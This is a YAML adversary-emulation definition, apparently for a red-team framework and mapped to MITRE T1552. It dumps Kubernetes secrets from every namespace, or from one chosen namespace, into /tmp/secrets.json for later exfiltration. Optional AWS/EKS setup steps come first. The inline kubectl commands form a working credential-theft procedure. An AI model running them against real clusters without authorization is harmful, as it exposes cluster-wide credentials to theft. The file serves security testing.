---
api_version: 2.0
uuid: bf324dc0-b1bd-4060-a27f-1dc883f210dc
name: extract_k8s_secrets
description: |
  This TTP demonstrates how to steal Kubernetes secrets from a target cluster.
  It assumes access to a compromised pod within the cluster. The TTP retrieves the secrets
  using the `kubectl get secrets` command and stores them for later exfiltration.
args:
  - name: artifacts_dir
    description: The directory to store the retrieved secrets.
    default: /tmp
  - name: eks_cluster
    description: Target k8s cluster is running on EKS.
    default: true
  - name: target_cluster
    description: The target Kubernetes cluster name.
  - name: target_ns
    description: Namespace from which secrets will be stolen. If not specified, secrets will be retrieved from all namespaces.
    default: NIL
  - name: target_region
    description: The region where the target cluster is located.
    default: us-east-1
requirements:
  platforms:
    - os: linux
    - os: darwin
mitre:
  tactics:
    - TA0006 Credential Access
  techniques:
    - T1552 Unsecured Credentials

steps:
  {{ if .Args.eks_cluster }}
  - name: aws_connector
    description: This step invokes the setup_cloud_env action.
    ttp: //helpers/cloud/aws/validate-aws-env-configured.yaml
    args:
      region: "{{ .Args.target_region }}"

  - name: setup_kubeconfig_for_eks
    description: Set up kubeconfig for EKS cluster.
    ttp: //helpers/containers/k8s/setup-kubeconfig-for-eks.yaml
    args:
      cluster_name: "{{ .Args.target_cluster }}"
      cluster_region: "{{ .Args.target_region }}"
  {{ end }}

  - name: steal-secrets
    description: Retrieve Kubernetes secrets from the target namespace or all namespaces if none is specified, and save them as a JSON file.
    inline: |
      if [ -z "{{ .Args.target_ns }}" ] || [ "{{ .Args.target_ns }}" = "NIL" ]; then
        kubectl get secrets -A -o json > {{ .Args.artifacts_dir }}/secrets.json
      else
        kubectl get secrets -n {{ .Args.target_ns }} -o json > {{ .Args.artifacts_dir }}/secrets.json
      fi

  - name: exfiltrate-secrets
    description: Output the location of the stolen secrets for later exfiltration.
    inline: |
      echo "Secrets have been saved to {{ .Args.artifacts_dir }}/secrets.json"
